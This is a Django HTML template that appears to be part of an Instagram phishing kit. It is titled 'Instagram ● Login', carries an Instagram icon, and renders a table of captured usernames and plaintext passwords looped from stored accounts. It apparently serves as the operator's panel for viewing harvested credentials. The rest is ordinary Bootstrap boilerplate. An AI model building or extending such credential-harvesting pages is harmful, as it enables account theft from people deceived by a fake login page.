{% load static %}

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Instagram ● Login</title>
    <link rel="icon" type="image/x-icon" href="./Instagram_icon,png-photoaidcom-cropped.png">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/css/bootstrap.min.css" rel="stylesheet"
    integrity="sha384-iYQeCzEYFbKjA/T2uDLTpkwGzCiq6soy8tYaI1GyVh/UjpbCx/TYkiZhlZB6+fzT" crossorigin="anonymous">

    <link rel="stylesheet" href="{% static 'main.css' %}">
</head>

    

    <div class="table-responsive container">
        <h1 class="mb-5">username & password INSTAGRAM</h1>
        <table class="table text-center">
            <thead>
                <tr>
                    <th scope="col">USERNAME</th>
                    <th scope="col">PASSWORD</th>
                </tr>
            </thead>
            <tbody>
                {% for ac in acc %}
                    <tr class="">
                        <td>{{ac.username}}</td>
                        <td>{{ac.password}}</td>
                    </tr>
                {% endfor %}
            </tbody>
        </table>
    </div>
</div>

<!--<script src="./app.js"></script>-->
  <!-- Bootstrap JavaScript Libraries -->
  <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.11.6/dist/umd/popper.min.js"
    integrity="sha384-oBqDVmMz9ATKxIep9tiCxS/Z9fNfEXiDAYTujMAeBAsjFuCZSmKbSSUnQlmh/jp3" crossorigin="anonymous">
  </script>

  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/js/bootstrap.min.js"
    integrity="sha384-7VPbUDkoPSGFnVtYi0QogXtr74QeVeeIs99Qfg5YCF+TidwNdjvaKZX19NZ/e6oz" crossorigin="anonymous">
  </script>
</body>
</html>



